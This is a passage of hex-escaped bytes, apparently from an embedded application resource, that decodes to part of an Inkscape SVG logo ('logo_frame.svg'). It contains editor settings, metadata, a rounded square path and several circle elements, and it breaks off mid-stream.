\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\x44\x54\x44\x2f\x73\x6f\x64\
\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\x74\x64\x22\x0d\x0a\x20\x20\
\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\x73\x63\x61\x70\x65\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\x61\x6d\x65\x73\x70\x61\
\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\x70\x65\x22\x0d\x0a\x20\
\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x35\x31\x32\x22\x0d\x0a\x20\
\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x35\x31\x32\x22\x0d\x0a\
\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\
\x31\x33\x35\x2e\x34\x36\x36\x36\x37\x20\x31\x33\x35\x2e\x34\x36\
\x36\x36\x37\x22\x0d\x0a\x20\x20\x20\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x31\x2e\x31\x22\x0d\x0a\x20\x20\x20\x69\x64\x3d\x22\x73\
\x76\x67\x38\x22\x0d\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x30\x2e\x39\x32\x2e\
\x34\x20\x35\x64\x61\x36\x38\x39\x63\x33\x31\x33\x2c\x20\x32\x30\
\x31\x39\x2d\x30\x31\x2d\x31\x34\x22\x0d\x0a\x20\x20\x20\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\
\x6c\x6f\x67\x6f\x5f\x66\x72\x61\x6d\x65\x2e\x73\x76\x67\x22\x0d\
\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\
\x6f\x72\x74\x2d\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x2f\x68\
\x6f\x6d\x65\x2f\x79\x65\x69\x73\x6f\x6e\x2f\x44\x65\x76\x65\x6c\
\x6f\x70\x6d\x65\x6e\x74\x2f\x67\x63\x70\x64\x73\x2f\x62\x63\x69\
\x2d\x75\x6e\x73\x63\x65\x6e\x74\x65\x64\x2f\x61\x73\x73\x65\x74\
\x73\x2f\x6c\x6f\x67\x6f\x2e\x70\x6e\x67\x22\x0d\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\x6f\x72\x74\x2d\
\x78\x64\x70\x69\x3d\x22\x39\x36\x22\x0d\x0a\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x65\x78\x70\x6f\x72\x74\x2d\x79\x64\
\x70\x69\x3d\x22\x39\x36\x22\x3e\x0d\x0a\x20\x20\x3c\x64\x65\x66\
\x73\x0d\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\
\x32\x22\x20\x2f\x3e\x0d\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\
\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\x77\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\
\x66\x66\x66\x66\x66\x22\x0d\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\
\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\x36\x36\
\x36\x22\x0d\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x6f\
\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0d\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\
\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\
\x22\x30\x2e\x39\x36\x32\x36\x30\x34\x33\x33\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\
\x32\x36\x33\x2e\x35\x36\x38\x36\x33\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\x31\x35\
\x34\x2e\x38\x39\x36\x34\x39\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\
\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\
\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\
\x22\x0d\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\
\x3d\x22\x66\x61\x6c\x73\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\
\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x30\x30\x34\x22\x0d\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\
\x69\x6e\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x79\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\
\x78\x69\x6d\x69\x7a\x65\x64\x3d\x22\x31\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x68\x6f\x77\
\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x66\x61\x6c\x73\
\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x75\x69\
\x64\x65\x73\x3d\x22\x66\x61\x6c\x73\x65\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\
\x62\x62\x6f\x78\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x62\x62\x6f\x78\x2d\
\x70\x61\x74\x68\x73\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x62\x62\x6f\x78\
\x2d\x6e\x6f\x64\x65\x73\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\
\x70\x2d\x62\x62\x6f\x78\x2d\x6d\x69\x64\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\x62\x62\x6f\x78\
\x2d\x65\x64\x67\x65\x2d\x6d\x69\x64\x70\x6f\x69\x6e\x74\x73\x3d\
\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x6f\x62\x6a\x65\x63\x74\x2d\x70\x61\x74\
\x68\x73\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\x69\x6e\
\x74\x65\x72\x73\x65\x63\x74\x69\x6f\x6e\x2d\x70\x61\x74\x68\x73\
\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\x6d\x69\x64\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x73\x6e\x61\x70\
\x2d\x73\x6d\x6f\x6f\x74\x68\x2d\x6e\x6f\x64\x65\x73\x3d\x22\x74\
\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x73\x6e\x61\x70\x2d\x6f\x62\x6a\x65\x63\x74\x2d\
\x6d\x69\x64\x70\x6f\x69\x6e\x74\x73\x3d\x22\x74\x72\x75\x65\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x73\x6e\x61\x70\x2d\x63\x65\x6e\x74\x65\x72\x3d\x22\x74\x72\x75\
\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\
\x67\x69\x6e\x2d\x74\x6f\x70\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\x67\x69\x6e\x2d\x6c\x65\x66\
\x74\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x66\x69\x74\x2d\
\x6d\x61\x72\x67\x69\x6e\x2d\x72\x69\x67\x68\x74\x3d\x22\x30\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x66\x69\x74\x2d\x6d\x61\x72\x67\x69\
\x6e\x2d\x62\x6f\x74\x74\x6f\x6d\x3d\x22\x30\x22\x20\x2f\x3e\x0d\
\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0d\x0a\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x35\
\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\
\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\x72\
\x6b\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\
\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\
\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\
\x66\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\
\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\
\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\
\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\
\x65\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\
\x3a\x57\x6f\x72\x6b\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\
\x66\x3a\x52\x44\x46\x3e\x0d\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\
\x64\x61\x74\x61\x3e\x0d\x0a\x20\x20\x3c\x67\x0d\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\
\x3d\x22\x43\x61\x70\x61\x20\x31\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\
\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0d\x0a\x20\x20\
\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\x22\x74\x72\
\x61\x6e\x73\x6c\x61\x74\x65\x28\x32\x31\x2e\x37\x30\x30\x32\x33\
\x37\x2c\x2d\x39\x32\x32\x2e\x35\x31\x39\x35\x34\x29\x22\x3e\x0d\
\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x74\x79\x70\x65\
\x3d\x22\x73\x74\x61\x72\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x74\x79\x6c\x65\x3d\x22\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\
\x2e\x33\x33\x3b\x66\x69\x6c\x6c\x3a\x23\x30\x65\x39\x37\x39\x38\
\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\
\x39\x39\x36\x30\x37\x38\x34\x33\x3b\x73\x74\x72\x6f\x6b\x65\x3a\
\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\
\x68\x3a\x31\x2e\x31\x36\x32\x37\x35\x32\x36\x33\x3b\x73\x74\x72\
\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x63\x61\x70\x3a\x72\x6f\x75\x6e\
\x64\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\
\x6e\x3a\x72\x6f\x75\x6e\x64\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\
\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\
\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x6f\x66\x66\
\x73\x65\x74\x3a\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x30\x2e\x31\x34\x31\x35\x35\x32\x35\x22\x0d\
\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\
\x31\x35\x37\x38\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x3a\x73\x69\x64\x65\x73\x3d\x22\x34\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x63\x78\x3d\x22\x34\x36\x2e\x30\x33\x33\x30\x39\x36\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x63\x79\x3d\x22\x39\x39\x30\x2e\x32\x35\x32\x38\x37\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x72\x31\x3d\x22\x37\x35\x2e\x37\x31\x32\x39\x36\x37\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x72\x32\x3d\x22\x35\x33\x2e\x35\x33\x37\x31\x34\x38\x22\
\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\
\x69\x3a\x61\x72\x67\x31\x3d\x22\x30\x2e\x37\x38\x35\x33\x39\x38\
\x31\x36\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\
\x70\x6f\x64\x69\x3a\x61\x72\x67\x32\x3d\x22\x31\x2e\x35\x37\x30\
\x37\x39\x36\x33\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x66\x6c\x61\x74\x73\x69\x64\x65\x64\
\x3d\x22\x74\x72\x75\x65\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x72\x6f\x75\x6e\x64\x65\x64\
\x3d\x22\x30\x2e\x32\x35\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x72\x61\x6e\x64\x6f\x6d\x69\
\x7a\x65\x64\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x64\x3d\x22\x6d\x20\x39\x39\x2e\x35\x37\x30\x32\x34\x39\x2c\x31\
\x30\x34\x33\x2e\x37\x39\x20\x63\x20\x2d\x31\x38\x2e\x39\x32\x38\
\x32\x34\x32\x2c\x31\x38\x2e\x39\x32\x38\x33\x20\x2d\x38\x38\x2e\
\x31\x34\x36\x30\x36\x33\x2c\x31\x38\x2e\x39\x32\x38\x33\x20\x2d\
\x31\x30\x37\x2e\x30\x37\x34\x33\x30\x34\x38\x2c\x30\x20\x2d\x31\
\x38\x2e\x39\x32\x38\x32\x34\x32\x32\x2c\x2d\x31\x38\x2e\x39\x32\
\x38\x32\x20\x2d\x31\x38\x2e\x39\x32\x38\x32\x34\x32\x32\x2c\x2d\
\x38\x38\x2e\x31\x34\x36\x30\x34\x20\x2d\x34\x65\x2d\x37\x2c\x2d\
\x31\x30\x37\x2e\x30\x37\x34\x32\x38\x20\x31\x38\x2e\x39\x32\x38\
\x32\x34\x31\x32\x2c\x2d\x31\x38\x2e\x39\x32\x38\x32\x35\x20\x38\
\x38\x2e\x31\x34\x36\x30\x36\x33\x32\x2c\x2d\x31\x38\x2e\x39\x32\
\x38\x32\x35\x20\x31\x30\x37\x2e\x30\x37\x34\x33\x30\x34\x32\x2c\
\x30\x20\x31\x38\x2e\x39\x32\x38\x32\x34\x32\x2c\x31\x38\x2e\x39\
\x32\x38\x32\x34\x20\x31\x38\x2e\x39\x32\x38\x32\x34\x32\x2c\x38\
\x38\x2e\x31\x34\x36\x30\x38\x20\x31\x30\x65\x2d\x37\x2c\x31\x30\
\x37\x2e\x30\x37\x34\x32\x38\x20\x7a\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x74\x72\x61\x6e\
\x73\x66\x6f\x72\x6d\x2d\x63\x65\x6e\x74\x65\x72\x2d\x79\x3d\x22\
\x2d\x32\x2e\x30\x34\x32\x30\x39\x37\x39\x65\x2d\x30\x35\x22\x20\
\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0d\
\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x31\x33\x39\x2e\
\x37\x32\x35\x32\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\
\x3d\x22\x2d\x35\x39\x31\x2e\x37\x30\x31\x31\x31\x22\x0d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x63\x69\x72\x63\x6c\x65\
\x31\x35\x34\x35\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\
\x79\x6c\x65\x3d\x22\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x36\
\x37\x32\x39\x39\x39\x39\x36\x3b\x66\x69\x6c\x6c\x3a\x23\x61\x61\
\x61\x61\x66\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\
\x79\x3a\x30\x2e\x33\x30\x31\x33\x36\x39\x38\x38\x3b\x73\x74\x72\
\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x33\x30\x34\x30\x34\
\x39\x33\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\
\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\
\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0d\
\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x30\x22\x20\x2f\x3e\
\x0d\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x30\x2e\x36\x37\x32\x39\x39\x39\x39\x36\x3b\x66\x69\
\x6c\x6c\x3a\x23\x61\x61\x61\x61\x66\x66\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x33\x30\x31\x33\x36\x39\
\x38\x38\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\x30\
\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\
\x2e\x33\x30\x34\x30\x34\x39\x33\x34\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\
\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x65\x6c\x6c\x69\x70\x73\x65\x31\x36\x31\x37\x22\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x39\x39\x33\x2e\
\x35\x31\x32\x38\x32\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x63\
\x79\x3d\x22\x31\x36\x38\x2e\x31\x33\x36\x31\x34\x22\x20\x2f\x3e\
\x0d\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x20\x20\x63\x79\x3d\x22\x37\x33\x33\x2e\x32\x30\x37\x37\
\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x39\
\x35\x38\x2e\x31\x34\x34\x30\x34\x22\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x65\x6c\x6c\x69\x70\x73\x65\x31\x39\x30\
\x36\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\
\x3d\x22\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x36\x37\x32\x39\
\x39\x39\x39\x36\x3b\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\
\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x33\x30\
\x31\x33\x36\x39\x38\x38\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\
\x30\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\
\x74\x68\x3a\x30\x2e\x37\x39\x33\x37\x34\x39\x39\x39\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\
\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\
\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\
\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0d\x0a\x20\x20\
\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0d\x0a\x20\x20\x20\x20\x20\
\x20\x20\x72\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\
\x63\x79\x3d\x22\x35\x38\x32\x2e\x33\x33\x30\x39\x39\x22\x0d\x0a\
\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x2d\x31\x35\x30\x30\
\x2e\x39\x37\x32\x32\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x65\x6c\x6c\x69\x70\x73\x65\x31\x39\x32\x36\x22\x0d\
\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x6f\
\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x36\x37\x32\x39\x39\x39\x39\
\x36\x3b\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\x6c\x6c\
\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x30\x2e\x33\x30\x31\x33\x36\
\x39\x38\x38\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\
\x30\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\
\x30\x2e\x37\x39\x33\x37\x34\x39\x39\x39\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\
\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\
\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\
\x63\x69\x72\x63\x6c\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x72\
\x3d\x22\x30\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\
\x22\x32\x35\x35\x2e\x39\x37\x38\x31\x22\x0d\x0a\x20\x20\x20\x20\
\x20\x20\x20\x63\x78\x3d\x22\x2d\x39\x35\x38\x2e\x31\x34\x34\x30\
\x34\x22\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x65\
\x6c\x6c\x69\x70\x73\x65\x31\x39\x34\x36\x22\x0d\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x30\x2e\x36\x37\x32\x39\x39\x39\x39\x36\x3b\x66\x69\
\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x30\x2e\x33\x30\x31\x33\x36\x39\x38\x38\x3b\
\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x37\x39\
\x33\x37\x34\x39\x39\x39\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\
\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\
\x31\x22\x20\x2f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x67\x0d\x0a\x20\
\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\
\x22\x6d\x61\x74\x72\x69\x78\x28\x30\x2e\x35\x38\x37\x39\x36\x32\
\x39\x38\x2c\x30\x2c\x30\x2c\x30\x2e\x35\x38\x37\x39\x36\x32\x39\
\x38\x2c\x2d\x32\x39\x2e\x32\x32\x36\x31\x36\x33\x2c\x39\x38\x30\
